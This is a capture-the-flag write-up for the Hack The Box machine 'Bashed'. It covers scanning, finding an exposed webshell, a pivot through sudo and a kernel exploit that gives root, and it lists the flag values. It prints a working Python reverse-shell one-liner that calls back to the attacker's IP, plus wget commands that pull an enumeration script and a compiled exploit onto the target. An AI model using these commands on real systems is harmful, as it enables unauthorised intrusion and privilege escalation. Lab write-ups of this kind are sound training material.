Bashed

July 22nd, 2020

Bashed logo

This is an easy linux box

Tools used

  • bash
  • chmod
  • ffuf
  • gcc
  • nc
  • nmap
  • python
  • searchsploit
  • sudo
  • wget

Reconnaissance

Nmap

nmap -sC -sV -oA bashed 10.10.10.68 -v

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 6AA5034A553DFA77C3B2C7B4C26CF870
| http-methods: 
|_  Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site

Here’s what nmap teaches us :

  • port 80 (HTTP) - Apache 2.4.18 (ubuntu)

So there is only the web port open, let’s go see what’s on it !

Website image

So there not a lot of thing on this website, only a two pages :

  • index.html
  • single.html

Single.html talks about something called “phpbash”, which is a webshell. So there may be a way to found it on the web server. Let’s do some files/directories brute force with ffuf :

ffuf -w /home/liodeus/directory-list-lowercase-2.3-medium.txt -u http://10.10.10.68/FUZZ -e .php,.html,.txt -t 10                                       

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.1.0-git
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.10.68/FUZZ
 :: Wordlist         : FUZZ: /home/liodeus/directory-list-lowercase-2.3-medium.txt
 :: Extensions       : .php .html .txt 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 10
 :: Matcher          : Response status: 200,204,301,302,307,401,403
________________________________________________

index.html              [Status: 200, Size: 7742, Words: 2956, Lines: 162]
images                  [Status: 301, Size: 311, Words: 20, Lines: 10]
about.html              [Status: 200, Size: 8190, Words: 2878, Lines: 155]
contact.html            [Status: 200, Size: 7802, Words: 2630, Lines: 157]
uploads                 [Status: 301, Size: 312, Words: 20, Lines: 10]
php                     [Status: 301, Size: 308, Words: 20, Lines: 10]
css                     [Status: 301, Size: 308, Words: 20, Lines: 10]
dev                     [Status: 301, Size: 308, Words: 20, Lines: 10]
js                      [Status: 301, Size: 307, Words: 20, Lines: 10]
config.php              [Status: 200, Size: 0, Words: 1, Lines: 1]
fonts                   [Status: 301, Size: 310, Words: 20, Lines: 10]
single.html             [Status: 200, Size: 7476, Words: 2740, Lines: 155]

There is 4 things that stands out from ffuf :

  • uploads
  • php
  • dev
  • config.php

Going throuth all of them, the most interresting one is “/dev” :

Index of /dev

Exploit

Going over : http://10.10.10.68/dev/phpbash.php, gives me access to the webshell with the same right as the web server :

Webshell

I don’t really like this webshell, so let’s get a reverse shell on my machine, first launch a nc listener :

nc -lvp 1234

Then on the webshell use this reverse shell from :

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.10",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

And I’m connected :

nc -lvp 1234
listening on [any] 1234 ...
10.10.10.68: inverse host lookup failed: Unknown host
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.68] 58018
/bin/sh: 0: can't access tty; job control turned off

Get a tty shell :

python -c "import pty;pty.spawn('/bin/bash')"

Now let’s escalate ! First things that I do is to see if I can run commands as someone else :

www-data@bashed:/var/www/html/dev$ sudo -l
sudo -l
Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL

So I can run any commands as “scriptmanager”, so give me a bash !

www-data@bashed:/var/www/html/dev$ sudo -u scriptmanager /bin/bash
sudo -u scriptmanager /bin/bash
scriptmanager@bashed:/var/www/html/dev$whoami
whoami
scriptmanager

And here I’m scriptmanager ! Now it’s enumeration time, let’s upload “LinEnum.sh” on the box. First, start python server to transfert files :

python -m SimpleHTTPServer

Then, on the reverse shell download it :

wget http://10.10.14.10:8000/LinEnum.sh

Now launch the enumeration script :

bash LinEnum.sh

This is what I looked first :

[-] Kernel information (continued):
Linux version 4.4.0-62-generic (buildd@lcy01-30) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.4) ) #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017

I learned that this is a Ubuntu 16.04.4, let’s found the release date on google :

So it’s been release more thant two years ago, there migth be some local privilege escalation, go found out with searchsploit :

Searchsploit Ubuntu

Download the exploit :

searchsploit -m linux/local/44298.c

Going throught the code, I didn’t found any compilation instruction, so I just compiled it with this basic command :

gcc 44298.c -o exploit

Upload the compiled exploit on the machine :

python -m SimpleHTTPServer

wget http://10.10.14.10:8000/exploit

Give the exploit execution rights :

chmod +x exploit

Then run it :

scriptmanager@bashed:/tmp$ ./exploit
./exploit
task_struct = ffff88003775d400
uidptr = ffff88003b7c0f04
spawning root shell
root@bashed:/tmp# whoami
whoami
root

And voila, I’m root ! Now go read the flags.

Flags

User.txt

root@bashed:/home/arrexel# cat user.txt
cat user.txt
2c281f318555dbc1b856957c7147bfc1

Root.txt

root@bashed:/root# cat root.txt
cat root.txt
cc4f0afe3a1026d402ba10329674a8e2